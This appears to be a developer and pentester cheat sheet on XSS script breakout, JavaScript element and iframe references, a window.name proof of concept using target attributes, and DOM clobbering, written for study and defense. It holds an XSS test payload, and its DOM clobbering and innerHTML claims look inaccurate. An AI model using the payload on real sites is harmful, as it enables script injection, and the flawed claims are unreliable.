    • Use strict output encoding based on context.
    • Never directly embed untrusted data inside <script>.
    • Prefer safe JSON serialization with application/json responses.
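
One common way to apply these defenses when data must be embedded in a page is to JSON-serialize it and escape the characters the HTML parser reacts to. The sketch below assumes the value is JSON-serializable; serializeForScript is a hypothetical helper name.

```javascript
// Serialize a value for embedding inside a <script> block.
// JSON.stringify handles quotes and backslashes; the replacements turn
// "<", ">" and "&" into JavaScript escapes so the HTML parser never sees
// "</script" or "<!--", and escape U+2028/U+2029 for older JS engines.
// Assumes `value` is JSON-serializable (JSON.stringify returns undefined otherwise).
function serializeForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

const untrusted = { key: "</script><img src=x onerror=alert(1)>" };
const embedded = serializeForScript(untrusted);

console.log(embedded);                   // contains no literal "<"
console.log(JSON.parse(embedded).key);   // round-trips to the original string
```

The escaped text is still valid JSON and valid JavaScript, so the consuming script reads the original value while the HTML parser has nothing to match.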

✅ Summary:

  • Script breakout relies on </script> injection.
  • Works in strings, comments, JSON, template literals.
  • Encodings and nested forms help evade filters.
  • Must always be checked during VAPT for XSS vectors.

HTML & JavaScript Reference Quirks

1. Referencing Elements by id

  • Elements with an id become accessible in JavaScript via:

    document.getElementById("myId")
  • Named access on window (quirk): elements with an id are also exposed as global variables, and current browsers still do this:

    <div id="myDiv"></div>
    console.log(myDiv); // <div id="myDiv">

    ⚠️ Easily shadowed by real variables, so not reliable, but still seen in old code.


2. Referencing Elements by name

  • Form controls with a name can be accessed directly:

    <input type="text" name="username">
    document.forms[0].username.value
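  • A name is exposed as a global only for <form>, <img>, <embed>, <object>, and frames, so a bare <input name> is not reachable this way (an id would be):

    console.log(typeof username); // "undefined" unless something else defines it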

3. Referencing Forms

  • Forms are accessible via document.forms (HTMLCollection):

    document.forms["loginForm"]
  • Inputs can be accessed directly through their parent form:

    document.forms["loginForm"].password.value

4. Iframes Referencing

  • If an iframe has id or name, it can be referenced like:

    <iframe id="childFrame" name="childFrame"></iframe>
    window.frames["childFrame"]
    window.childFrame // via name as global (quirky legacy)
    document.getElementById("childFrame").contentWindow

5. Accessing Iframe Documents

  • From parent → iframe:

    let iframe = document.getElementById("childFrame");
    iframe.contentWindow.document
    iframe.contentDocument // alias in many browsers
  • From iframe → parent:

    window.parent.document
    window.top.document // top-level document
  • From iframe → itself:

    window.frameElement // the <iframe> element inside parent

6. Other Properties of Iframes

  • contentWindow → The window object of the iframe.
  • contentDocument → The document object inside iframe.
  • window.frames → Array-like collection of iframes.
  • frameElement → Inside iframe, references the <iframe> element embedding it.
  • window.top → The topmost browsing context.
  • window.parent → Direct parent browsing context.

7. Legacy & Quirky Behaviors

  • Browsers may auto-expose id and name attributes of iframes as global variables:

    <iframe name="legacyFrame"></iframe>
    console.log(legacyFrame); // the frame's window object, not the <iframe> element
  • This can lead to conflicts if the id/name matches a real variable.

  • Modern best practice: always use document.getElementById or window.frames.


✅ Key Takeaways

  • id and name can leak into global scope (quirky legacy behavior).
  • Forms auto-expose their elements by name.
  • Iframes can be accessed from both parent and child via contentWindow, contentDocument, frameElement.
  • Same-origin policy limits actual access: if iframe is cross-origin, contentDocument is null and most properties of contentWindow throw security errors.
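
Because cross-origin access fails in two different ways (a null contentDocument, or an exception from contentWindow), a defensive accessor helps when enumerating frames. This is a minimal sketch; tryGetFrameDocument is a hypothetical helper, and the two objects at the bottom are plain mocks standing in for iframe elements so the snippet also runs outside a browser.

```javascript
// Return the frame's document when it is reachable, otherwise null.
function tryGetFrameDocument(iframe) {
  try {
    // contentDocument is null for cross-origin frames; the fallback through
    // contentWindow.document throws in that case, which the catch absorbs.
    return iframe.contentDocument ?? iframe.contentWindow.document;
  } catch (err) {
    return null;
  }
}

// Mock of a same-origin frame (assumption for illustration only).
const sameOriginFrame = { contentDocument: { title: "child" } };

// Mock of a cross-origin frame: null contentDocument, throwing document getter.
const crossOriginFrame = {
  contentDocument: null,
  contentWindow: {
    get document() {
      throw new Error("SecurityError (mock)");
    },
  },
};

console.log(tryGetFrameDocument(sameOriginFrame));
console.log(tryGetFrameDocument(crossOriginFrame));
```

In a browser the same function can be called with document.getElementById("childFrame") from the examples above.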

<base target> → sets window.name (short PoC)

Short: A <base target="NAME"> where NAME is not a reserved keyword (_self, _blank, _parent, _top) becomes a named browsing context. Pages opened using that base will have window.name = "NAME" (even cross-origin).

PoC

1) page-set.html: page that sets the base target and links:

<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <base target="attacker_window">
  <title>Base Target Setter</title>
</head>
<body>
  <a href="https://example.com" id="link">Open example.com</a>
  <p>Click the link to open example.com in a window named "attacker_window".</p>
</body>
</html>

2) page-read.html: page you can open in the named window to check window.name (host anywhere, e.g., serve locally):

<!doctype html>
<html>
<head><meta charset="utf-8"><title>Read window.name</title></head>
<body>
  <h1>window.name = <span id="n"></span></h1>
  <script>
    document.getElementById('n').textContent = window.name || '(empty)';
    console.log('window.name =>', window.name);
  </script>
</body>
</html>

Quick test

  1. Serve page-set.html (e.g., python3 -m http.server 8000) and open it.
  2. Click the link: it opens https://example.com in a tab/window named attacker_window.
  3. In that new tab, open devtools console and run window.name: it should print "attacker_window".
  4. Alternatively, navigate that window to your page-read.html to see the name rendered.

Notes & Mitigation

  • Do not reflect untrusted values into <base target>.
  • Remove or sanitize <base> from user-submitted HTML.
  • Avoid using window.name for sensitive data; clear it early if you control the page.

🔹 HTML form & target Attributes Cheatsheet

form attribute

  • Used on <input> / <button> to bind them to a <form> element by id, even if they are placed outside.

Example:

<form id="mainForm" action="/submit">
  <input type="text" name="username">
</form>

<button type="submit" form="mainForm">Submit (outside form)</button>

action attribute (and default behavior)

  • Defines the URL where form data is sent.
  • If omitted → form submits to the same page/URL where it resides.

Example:

<form method="post">
  <input type="text" name="data">
  <button type="submit">Submit</button>
</form>

➡️ Submits to the current page's URL.


Extra form* attributes

  • formaction → overrides action on specific submit button.
  • formmethod → overrides method (GET/POST).
  • formenctype → overrides enctype (e.g., multipart/form-data).
  • formtarget → overrides target for a specific button.
  • formnovalidate → skips HTML5 validation for that button.

Example:

<form action="/default" method="post">
  <input type="email" name="email" required>
  <button type="submit">Normal Submit</button>
  <button type="submit" formaction="/alt" formmethod="get" formnovalidate>
    Alternate Submit
  </button>
</form>

target attribute

Specifies where to display the result of form submission or link navigation. Applies to: <form>, <a>, <area>, <base>, <button type="submit">.

Standard values:

  • _self β†’ default, same tab/frame.
  • _blank β†’ new tab/window.
  • _parent β†’ parent browsing context (if inside iframe).
  • _top β†’ full window, breaks out of iframes.

Custom values:

  • Any other string (e.g. reportFrame, customWin) β†’ opens/reuses a named browsing context.
  • That name becomes the new window’s window.name.

⚑ Quirk: target sets window.name

If you use a non-standard value in target, the opened window inherits that string as its window.name β€” even for cross-origin pages.

PoC:

<form action="https://example.com" method="get" target="attackerWin">
  <button type="submit">Open Example</button>
</form>
  • When submitted, https://example.com opens in a new window/tab.
  • That window’s window.name is now "attackerWin".
  • Later navigation in that tab retains the same window.name.

🧭 HTML Element Properties & Attribute Quirks Cheatsheet

πŸ“˜ Developer + Security Reference


🧩 1. Overview

Every HTML element has two related but distinct layers when accessed via JavaScript:

| Layer | Accessed via | Description |
|---|---|---|
| Attribute | element.getAttribute() / .setAttribute() | The literal HTML markup string value |
| Property | element.propertyName | The DOM’s live JS object representation |

Example:

<input id="x" type="checkbox" checked>
<script>
  const el = document.getElementById("x");
  console.log(el.getAttribute("checked")); // "": attribute exists
  console.log(el.checked); // true (boolean property)
</script>

🧱 2. Attribute vs Property Differences

Concept Attribute Property
Storage In HTML markup In the DOM object
Type Always string Typed (boolean, number, object, etc.)
Reflects changes? No, unless explicitly linked Sometimes
Example el.getAttribute('value') el.value

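🔄 3. Common Reflected Attributes

| Element | Attribute ↔ Property Mapping |
|---|---|
| <input> | value (↔ defaultValue), checked (↔ defaultChecked), disabled, type, name |
| <a> | href, target, rel |
| <img> | src, alt, width, height |
| <textarea> | rows, cols (value is property-only; the default comes from the element's text content) |
| <option> | value, selected (↔ defaultSelected), label |
| <form> | action, method, target (elements is property-only) |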

⚠️ Quirk Example

el.setAttribute("value", "foo"); // updates attribute only
console.log(el.value); // still the live value property, may differ!
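
The way an input's value attribute and value property drift apart can be illustrated with a simplified model. ModelInput below is a hypothetical class written for this note, not a browser API, and it only imitates the "dirty" behavior: once the property has been written, the attribute stops driving it.

```javascript
// Simplified model of how <input> treats the value attribute and property.
class ModelInput {
  #attrs = new Map();
  #value = "";
  #dirty = false; // becomes true once the value property is written

  setAttribute(name, val) {
    this.#attrs.set(name.toLowerCase(), String(val));
  }
  getAttribute(name) {
    return this.#attrs.get(name.toLowerCase()) ?? null;
  }

  // The property shows the attribute (the default value) until it is dirtied.
  get value() {
    return this.#dirty ? this.#value : (this.getAttribute("value") ?? "");
  }
  set value(v) {
    this.#value = String(v);
    this.#dirty = true;
  }
}

const el = new ModelInput();
el.setAttribute("value", "foo");
console.log(el.value);                 // "foo" (property follows the attribute)
el.value = "typed";                    // simulates user input or a script write
el.setAttribute("value", "bar");
console.log(el.getAttribute("value")); // "bar"
console.log(el.value);                 // "typed" (attribute no longer drives it)
```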

🧠 4. Element Property Accessors

Property Description Notes
innerHTML HTML inside element Executes script on assignment (dangerous)
outerHTML Entire element HTML Replaces node when set
textContent Plain text (no markup) Safe from HTML parsing
innerText Visible text (layout-dependent) Slower, triggers reflow
classList Token list of classes Add/remove/toggle easily
dataset Map of data-* attributes Converts data-user-id β†’ el.dataset.userId
style Inline CSS style object Live reflection of inline styles
attributes NamedNodeMap of all attributes Iteration may differ by browser

🧩 5. Live vs Static Collections

Method Returns Live?
document.getElementsByTagName() HTMLCollection βœ… Live
document.getElementsByClassName() HTMLCollection βœ… Live
document.querySelectorAll() NodeList ❌ Static
element.children HTMLCollection βœ… Live
element.childNodes NodeList βœ… Live

Quirk

const list = document.getElementsByTagName('div');
document.body.appendChild(document.createElement('div'));
console.log(list.length); // updated automatically!

⚙️ 6. Boolean Attribute Rules

Boolean attributes are true if present, regardless of value.

<input type="checkbox" checked="false">
<script>
  console.log(document.querySelector('input').checked); // true
</script>

| Examples | Behavior |
|---|---|
| disabled, checked, readonly, multiple | Presence → true |
| el.removeAttribute('disabled') | Removing the attribute → false |
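
A common mistake is to compare a boolean attribute's value with the string "true". The presence rule can be sketched as a tiny helper; booleanAttrIsOn is a hypothetical name, and its argument stands for whatever el.getAttribute(name) returns (null when the attribute is absent).

```javascript
// Hypothetical helper mirroring how a boolean content attribute is read:
// getAttribute() yields null when absent and a string (possibly "") when present.
function booleanAttrIsOn(attrValue) {
  return attrValue !== null && attrValue !== undefined;
}

console.log(booleanAttrIsOn(""));      // true  -> <input checked>
console.log(booleanAttrIsOn("false")); // true  -> <input checked="false">
console.log(booleanAttrIsOn(null));    // false -> attribute absent
```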

🧩 7. Case Sensitivity & Normalization

  • HTML attributes are case-insensitive, DOM properties are case-sensitive.
  • el.getAttribute("CLASS") β†’ returns same as "class".
  • But el["CLASS"] β†’ undefined.
  • DOM converts names to lowercase internally for HTML (but not XML).

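💬 8. Attribute Serialization Quirks

| Operation | Result |
|---|---|
| el.outerHTML | Serializes current DOM, not original HTML |
| el.cloneNode(true) | Copies attributes and descendants; listeners added with addEventListener and custom JS properties are not copied |
| JSON.stringify(el) | Returns "{}" (DOM properties are prototype accessors, not own enumerable properties) |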
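
The JSON.stringify result is easier to see with a stand-in object. FakeElement below is a hypothetical class that only imitates how DOM interfaces expose state through prototype accessors, and attributesToObject is an assumed helper name; on a real element the same helper would rely on getAttributeNames() and getAttribute().

```javascript
// Stand-in that exposes state through accessors on the prototype,
// the way DOM interfaces do, rather than through own properties.
class FakeElement {
  #attrs = new Map([["id", "box"], ["class", "card"]]);
  get id() { return this.#attrs.get("id"); }
  get className() { return this.#attrs.get("class"); }
  getAttributeNames() { return [...this.#attrs.keys()]; }
  getAttribute(name) { return this.#attrs.get(name) ?? null; }
}

// Hypothetical helper: collect attributes into a plain object before serializing.
function attributesToObject(el) {
  return Object.fromEntries(
    el.getAttributeNames().map((name) => [name, el.getAttribute(name)])
  );
}

const el = new FakeElement();
console.log(el.id);                                  // prints box
console.log(JSON.stringify(el));                     // prints {}
console.log(JSON.stringify(attributesToObject(el))); // prints {"id":"box","class":"card"}
```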

🧩 9. Dataset (data-*) Attributes

<div id="box" data-user-id="42" data-role="admin"></div>
<script>
  const el = document.getElementById('box');
  console.log(el.dataset.userId); // "42"
  el.dataset.role = "moderator";
</script>

| Attribute | Access via JS | Reflects back? |
|---|---|---|
| data-user-id="42" | el.dataset.userId | ✅ Yes |
| data-user_name="a" | el.dataset.user_name | ✅ Yes, but underscores are not camelized (only a hyphen followed by a lowercase letter is) |
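
The name conversion can be sketched as a pure function. attrToDatasetKey is a hypothetical name used here for illustration; it is not a DOM API, and it covers only the attribute-name to key direction.

```javascript
// Sketch of the attribute-name -> dataset-key conversion.
function attrToDatasetKey(attrName) {
  const lower = attrName.toLowerCase(); // HTML attribute names are lowercased
  if (!lower.startsWith("data-")) return null;
  // Only "-" followed by an ASCII lowercase letter is camelized.
  return lower.slice(5).replace(/-([a-z])/g, (_, ch) => ch.toUpperCase());
}

console.log(attrToDatasetKey("data-user-id"));   // "userId"
console.log(attrToDatasetKey("data-user_name")); // "user_name"
console.log(attrToDatasetKey("data-role-2x"));   // "role-2x"
```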

⚠️ 10. Security Quirks (XSS / DOM Clobbering)

🧨 10.1 Dangerous Setters

Property Risk Example
innerHTML XSS injection el.innerHTML = userInput;
outerHTML XSS injection, node replaced
srcdoc (iframe) Inline document injection iframe.srcdoc = userInput;
on* handlers Executes arbitrary code el.onclick = eval("...")

🧨 10.2 DOM Clobbering

If user input creates element IDs/names matching global variables, JS can be overridden.

<form name="login">
  <input name="document" value="pwned">
</form>
<script>
  console.log(document); // now references <input>, not the global document!
</script>

✅ Mitigations

  • Always use textContent instead of innerHTML when inserting untrusted text.
  • Render untrusted HTML inside a sandboxed iframe (sandbox without allow-scripts) so injected handlers cannot run.
  • Use CSP (script-src, require-trusted-types-for) to reduce the impact of DOM-based XSS.
  • Validate element names and IDs before injection.

🧩 11. Property vs Attribute Examples

Element Attribute Property Example
<input value="a"> "a" "a" setAttribute affects markup only
<input> then el.value = "b" "a" "b" Property changed only
<img src="x.png"> "x.png" Absolute URL (http://.../x.png) Browser normalizes URL
<option selected> "" true Boolean reflection

🧠 12. Useful Dev Patterns

// Enumerate all attributes
[...el.attributes].forEach(attr => console.log(attr.name, attr.value));

// Copy attributes to another element
for (const {name, value} of el.attributes) clone.setAttribute(name, value);

// Safely insert text
el.textContent = userInput; // prevents XSS

// Dynamically create element
const btn = Object.assign(document.createElement('button'), {
  type: 'button',
  textContent: 'Click me',
  className: 'safe-btn'
});

🧾 13. Summary Table

Category Safe API Dangerous API Notes
Text insertion textContent, createTextNode innerHTML, outerHTML XSS risk
Attribute setting setAttribute (sanitized) Direct event attributes
Style el.style.property style.cssText from input
Structure appendChild, replaceWith insertAdjacentHTML

✅ 14. Best Practices

  • Prefer property access over attribute manipulation for live state.
  • Always sanitize input before writing to the DOM.
  • Use textContent for user-generated data.
  • Avoid dynamic creation of on* event attributes.
  • Enforce a Content Security Policy to block inline scripts.
  • Audit use of innerHTML in client-side templates.
